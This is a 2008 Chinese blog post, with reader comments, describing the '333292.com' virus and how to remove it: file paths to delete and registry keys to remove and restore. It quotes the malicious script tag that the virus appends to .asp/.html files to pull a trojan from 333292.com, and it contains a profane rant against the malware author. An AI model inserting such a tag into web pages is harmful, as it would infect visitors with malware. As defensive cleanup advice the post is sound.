333292.com病毒清除方法，真折磨人

Author：Flymorn Source：飘易博客
Categories：病毒攻防 PostTime：2008-1-14 23:08:59

正文：

今天白天电脑被MM从网上下载了几个文件安装后，俺回家打开几个本地的asp文件，竟然发现加载的很慢；马上打开.asp文件查看源码，发现每个asp、html文件都被插入一段病毒代码：<script language=javascript src=http://www.333292.com/cb.js></script>，网上一查，该病毒真是恶名昭著，罪行累累啊。金山毒霸报警为病毒VBS.AgentDlT.lb。

中此病毒333292.com的机子最明显的特证就是在电脑所有网页文件，含.asp/.php/.html/.htm末尾注入一行代码<script language=javascript src=http://www.333292.com/cb.js></script>代码，打开中毒的网页就自动下载这个网站的木马，然后是无止境的木马一下子跑到你电脑上来。

真是恶毒的病毒啊，我问候333292.com病毒制造者他十八代祖宗，TMD什么事不干，偏偏干这种遗臭万年的事。你以为你TMD的赚点昧良心的黑钱，你就神气了，我诅咒你白天走路被车撞成一级残废，不要撞死，让你慢慢享受；晚上睡觉做梦嗝屁，早点去见你老祖宗吧，省得丢人现眼，……（此处省略1万字）。

发泄完毕了，嘿嘿，还是来提供杀毒方法吧。

首先下载飘易博客提供的这个批量替换专杀工具，这个工具是熊猫烧香作者李俊被抓后2007年2月9日于仙桃市第一看守所写的一个忏悔专门对付熊猫烧香类病毒的专杀，对付这个病毒同样有效。下载地址：病毒专杀工具-批量替换（抱歉，暂停）

或者使用iframekill v1.1网页附加代码清除工具，清除在html、ASP等网页后面附加<iframe>等的文件，或使用其也字符替换器软件进行批量替换也行。此病毒为ARP病毒，除了上面修复外，建议使用ARP防火墙病毒对系统进行防预，可以使用360防火墙进行防预或金山毒霸的清理专家，效果不错。

上面的方法专杀后，请用最新版的杀毒软件杀毒，全盘扫描，换我一个清净的系统。

另，网上还有另种手工清毒的法子，我个人认为如果你的杀毒软件的病毒库够新，基本不用如此麻烦的。大家可以试试该方法：

333292.com病毒清除办法

1、删除病毒文件：
%HomeDrive%\autorun.inf
%HomeDrive%\ncltkyp.exe %DriveLetter%\autorun.inf
%DriveLetter%\ncltkyp.exe
%ProgramFiles%\CommonFiles\MicrosoftShared\huatatq.exe
%ProgramFiles%\Common Files\Microsoft Shared\kljimyq.inf
%ProgramFiles%\Common Files\System\kljimyq.inf
%ProgramFiles%\Common Files\System\qjineui.exe
%ProgramFiles%\meex.exe

2、删除病毒添加的注册表项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run]
kljimyq
ncltkyp
Debugger

3、恢复下列注册表项

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]DWORD："ShowSuperHidden"="1" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden] "Type"="checkbox"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\helpsvc] "Start"="2"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess] "Start"="2"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]Start"="2"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv] Start"="2"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]NNoDriveTypeAutoRun"="0"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001 \Control\SafeBoot\Minimal \{ 4D36E967-E325-11CE-BFC1-08002BE10318 }]
注册表值: "@"
类型： REG_SZ
字符串："DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{ 4D36E967-E325-11CE-BFC1-08002BE10318 }]
注册表值: "@"
类型： REG_SZ
字符串："DiskDrive"

作者：Flymorn
来源：飘易博客
版权所有。转载时必须以链接形式注明作者和原始出处及本声明。

Tag：333292.com 病毒浏览(次) 我要评论(7条)

上一篇：IE6漏洞百出，IE7浏览速度慢，失败

下一篇：Google无法验证网站：由于服务器超时，我们无法验证您的文件

7条评论 “333292.com病毒清除方法，真折磨人”

1 受害者

2008-1-15 11:08:19

不是吧说谢谢啦居然说留言内容太短怎么说呢还是要说谢谢你啊我可是受害者啊痛苦中这么多网页不敢删除啊要不早格盘了

2 网站优化

2008-1-15 18:58:36

晕，兄弟，这样会被k的。你看我那个virusoft.org.cn就是了

3 Flymorn

2008-1-15 20:48:30

小魏，啥意思？我并不是提供病毒什么的，而是提供清除他们的方法，杀毒而已。
呵呵，和你那专门的virusoft.org.cn是不一样的；
看你的域名解释好像是推广病毒软件软件似的，虽然实际不是，但有误解。
而这篇文章，是讲述 clear 病毒的~~

4 网站优化

2008-1-16 9:05:44

我是说你这种优化方法会被封的，等着看吧，我那个virusoft 55篇文章吧，一天1500IP 被百度x了

5 啊啊啊

2008-1-28 21:52:18

我正在用熊猫扫啊……我每次打开泡泡堂卡巴都弹出来这个333292,真郁闷～～～刚才看着它扫过了泡泡堂了，但什么也没发现……我感觉这个也不行了55555555555

6 网站优化

2008-1-31 10:52:44

怎么都跟我网站上来的人一样，被病毒逼疯了吧估计？很少有不骂人的。晕一个

7 anansecurity

2009-3-11 11:48:59

这个病毒样本，谁有？

发表评论

名称(*必填)

邮件(选填)

网站(选填)

记住我,下次回复时不用重新输入个人信息

飘易搜索